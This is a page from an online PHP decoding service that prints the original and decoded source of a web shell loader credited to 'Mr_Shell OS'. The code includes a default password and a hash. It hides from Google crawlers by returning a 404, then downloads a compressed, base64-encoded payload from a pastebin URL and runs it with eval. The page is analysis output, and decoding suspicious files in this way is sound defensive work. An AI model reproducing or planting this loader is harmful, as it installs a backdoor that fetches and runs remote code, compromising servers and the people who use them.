Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /*/ // Recoded by Mr_Shell OS // Created By : Shell OS // default password : y..

Decoded Output download

<?php 
 
/*/ 
// Recoded by Mr_Shell OS 
// Created By : Shell OS 
// default password : yassine 
/*/ 
  
$auth_pass = "5bfe0c405c67de32b1de9ea40d093666"; 
$color = "#00ff00"; 
$default_action = 'FilesMan'; 
@define('SELF_PATH', __FILE__); 
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { 
    header('HTTP/1.0 404 Not Found'); 
    exit; 
} 
$hannaichi = file_get_contents('http://pastebin.com/raw.php?i=tzjsw95t'); 
eval(gzinflate(base64_decode($hannaichi))); 
?> 
<script type="text/javascript">document.write('</script>
</head>
 <style>
body {
color:#008B8B;background:url(http://mentarionline.com/images/Ant-x.jpg) repeat center center fixed black;}');</script>

Did this file decode correctly?

Original Code

<?php

/*/
// Recoded by Mr_Shell OS
// Created By : Shell OS
// default password : yassine
/*/
 
$auth_pass = "5bfe0c405c67de32b1de9ea40d093666";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
$hannaichi = file_get_contents('http://pastebin.com/raw.php?i=tzjsw95t');
eval(gzinflate(base64_decode($hannaichi)));
?>
<script type="text/javascript">document.write('\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u000D\u003C\u002F\u0068\u0065\u0061\u0064\u003E\u000D\u0020\u003C\u0073\u0074\u0079\u006C\u0065\u003E\u000D\u0062\u006F\u0064\u0079\u0020\u007B\u000D\u0063\u006F\u006C\u006F\u0072\u003A\u0023\u0030\u0030\u0038\u0042\u0038\u0042\u003B\u0062\u0061\u0063\u006B\u0067\u0072\u006F\u0075\u006E\u0064\u003A\u0075\u0072\u006C\u0028\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u006D\u0065\u006E\u0074\u0061\u0072\u0069\u006F\u006E\u006C\u0069\u006E\u0065\u002E\u0063\u006F\u006D\u002F\u0069\u006D\u0061\u0067\u0065\u0073\u002F\u0041\u006E\u0074\u002D\u0078\u002E\u006A\u0070\u0067\u0029\u0020\u0072\u0065\u0070\u0065\u0061\u0074\u0020\u0063\u0065\u006E\u0074\u0065\u0072\u0020\u0063\u0065\u006E\u0074\u0065\u0072\u0020\u0066\u0069\u0078\u0065\u0064\u0020\u0062\u006C\u0061\u0063\u006B\u003B\u007D');</script>

Function Calls

define 1

Variables

$color #00ff00
$auth_pass 5bfe0c405c67de32b1de9ea40d093666
$default_action FilesMan

Stats

MD5 f54241c4f83dc139c9bee8ef2d9670c6
Eval Count 0
Decode Time 81 ms